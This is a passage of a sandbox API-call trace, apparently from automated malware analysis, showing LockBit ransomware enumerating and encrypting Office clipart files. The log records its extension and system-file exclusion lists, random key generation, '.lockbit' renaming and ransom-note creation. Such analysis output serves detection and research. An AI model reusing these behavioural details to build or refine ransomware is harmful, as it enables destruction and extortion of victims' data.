dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0146.750] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.750] malloc (_Size=0x40068) returned 0x3df0008 [0146.750] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3704) returned 1 [0146.750] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.751] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0146.751] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.751] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0146.752] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0146.757] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.757] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.757] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0146.757] free (_Block=0x1fa2ed8) [0146.757] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.757] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.757] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.757] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153265.WMF", cAlternateFileName="")) returned 1 [0146.757] lstrcmpiW (lpString1=".", lpString2="J0153265.WMF") returned -1 [0146.757] lstrcmpiW (lpString1="..", lpString2="J0153265.WMF") returned -1 [0146.757] PathFindExtensionW (pszPath="J0153265.WMF") returned=".WMF" [0146.757] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.758] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.759] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.759] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153265.WMF") returned 1 [0146.759] lstrcmpiW (lpString1="ntldr", lpString2="J0153265.WMF") returned 1 [0146.759] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153265.WMF") returned 1 [0146.759] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153265.WMF") returned -1 [0146.759] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153265.WMF") returned -1 [0146.759] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153265.WMF") returned 1 [0146.759] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153265.WMF") returned -1 [0146.760] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.760] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF") returned=".WMF" [0146.760] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.760] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.760] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.761] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.761] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.761] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.761] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.761] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF.lockbit") returned 72 [0146.761] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153265.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0146.762] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.762] malloc (_Size=0x40068) returned 0x3df0008 [0146.762] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3008) returned 1 [0146.762] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.762] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0146.763] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.763] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0146.763] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0146.771] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.771] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.771] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.772] free (_Block=0x1fa2ed8) [0146.772] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.772] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.772] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.772] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4e80, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153273.WMF", cAlternateFileName="")) returned 1 [0146.772] lstrcmpiW (lpString1=".", lpString2="J0153273.WMF") returned -1 [0146.772] lstrcmpiW (lpString1="..", lpString2="J0153273.WMF") returned -1 [0146.773] PathFindExtensionW (pszPath="J0153273.WMF") returned=".WMF" [0146.773] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.773] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.774] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.774] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153273.WMF") returned 1 [0146.774] lstrcmpiW (lpString1="ntldr", lpString2="J0153273.WMF") returned 1 [0146.774] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153273.WMF") returned 1 [0146.774] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153273.WMF") returned -1 [0146.774] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153273.WMF") returned -1 [0146.775] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153273.WMF") returned 1 [0146.775] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153273.WMF") returned -1 [0146.775] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.775] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF") returned=".WMF" [0146.775] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.775] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.775] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.776] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.776] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.776] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.776] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.776] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.776] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF.lockbit") returned 72 [0146.776] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153273.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0146.777] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.777] malloc (_Size=0x40068) returned 0x1ff1e60 [0146.777] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=20096) returned 1 [0146.777] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.777] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0146.778] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.778] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0146.778] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.783] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.783] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.783] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.785] free (_Block=0x1fa2ed8) [0146.785] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.785] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.785] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.785] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8f0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153299.WMF", cAlternateFileName="")) returned 1 [0146.785] lstrcmpiW (lpString1=".", lpString2="J0153299.WMF") returned -1 [0146.785] lstrcmpiW (lpString1="..", lpString2="J0153299.WMF") returned -1 [0146.785] PathFindExtensionW (pszPath="J0153299.WMF") returned=".WMF" [0146.785] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.785] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.785] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.786] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.786] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.787] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 